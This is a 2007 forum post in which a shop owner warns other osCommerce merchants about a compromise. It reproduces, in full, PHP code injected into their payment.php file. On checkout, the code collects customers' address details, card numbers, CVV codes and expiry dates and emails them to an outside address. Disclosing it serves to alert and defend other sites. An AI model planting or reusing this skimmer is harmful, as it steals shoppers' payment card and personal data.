Guest Posted June 28, 2007 Posted June 28, 2007 I am not sure how this happened, but I am looking into it... I suspect a compromised admin password. It is important that others check to insure that they were not hacked, and I would love feedback from anyone else that might have the same issue. Sometime yesterday my includes/classes/payment.php file was changed to include this code above the code header: <?php $urlz=$_SERVER['REQUEST_URI']; if (eregi("checkout_confirmation.php", $urlz)) { $td_query = tep_db_query("select * from " . TABLE_ADDRESS_BOOK . " where customers_id = '" . $customer_id . "'"); $duong = tep_db_fetch_array($td_query); $firstname123=$duong['entry_firstname']; $lastname123=$duong['entry_lastname']; $street_address123=$duong['entry_street_address']; $city123=$duong['entry_city']; $zone_id=$duong['entry_zone_id']; $statex=$duong['entry_state']; if(($statex=="")||($statex=="0")) { $td_queryxx = tep_db_query("select * from " . TABLE_ZONES . " where zone_id = '" . $zone_id . "'"); $duongxx = tep_db_fetch_array($td_queryxx); $state123 = $duongxx['zone_name']; }else {$state123=$statex;} $country=$duong['entry_country_id']; $td_queryxxx = tep_db_query("select * from " . TABLE_COUNTRIES . " where countries_id = '" . $country . "'"); $duongxxx = tep_db_fetch_array($td_queryxxx); $country123 = $duongxxx['countries_name']; $postcode123=$duong['entry_postcode']; $td_query2 = tep_db_query("select * from " . TABLE_CUSTOMERS . " where customers_id = '" . $customer_id . 
"'"); $duong2 = tep_db_fetch_array($td_query2); $telephone123=$duong2['customers_telephone']; $email_address123=$duong2['customers_email_address']; $dob123 = $duong2['customers_dob']; $site = "[edited.to.protect.innocent]"; $headers123 = "From:Website $site"; $headers123 .= "<$site>\n"; $headers123 .= "X-Sender: <$site>\n"; $headers123 .= "X-Mailer: PHP\n"; $headers123 .= "Return-Path:<[email protected]>\n"; $headers123 .= "Content-Type:text/html; "; $headers123 .= "charset=iso-8859-1\n"; $message123 = "Name : $firstname123 $lastname123 <br>"; $message123 .= "Telephone : $telephone123 <br>"; $message123 .= "Email : $email_address123 <br>"; $message123 .= "Street : $street_address123 <br>"; $message123 .= "Postcode : $postcode123 <br>"; $message123 .= "City : $city123 <br>"; $message123 .= "State : $state123 <br>"; $message123 .= "Country : $country123 <br>"; $ccowner123 = $HTTP_POST_VARS['cc_owner']; $ccnumber123 = $HTTP_POST_VARS['cc_number']; $tmp1 = $HTTP_POST_VARS['cc_cvmvalue']; $tmp2 = $HTTP_POST_VARS['cc_expires_month'] . "/" . $HTTP_POST_VARS['cc_expires_year']; $message123 .= "CC Owner : $ccowner123 <br>"; $message123 .= "CC Number : $ccnumber123 <br>"; $message123 .= "CVV2 : $tmp1 <br>"; $message123 .= "Date Expire : $tmp2 <br>"; $message123 .= "Site : http://$site <br>"; if(($ccnumber123!="")&&($tmp1!="")&&($tmp1!="0")){ mail("[email protected]","Cvv - Site $site!",$message123,$headers123); } } /* $Id: payment.php,v 1.37 2003/06/09 22:26:32 hpdl Exp $ osCommerce, Open Source E-Commerce Solutions http://www.oscommerce.com ...etc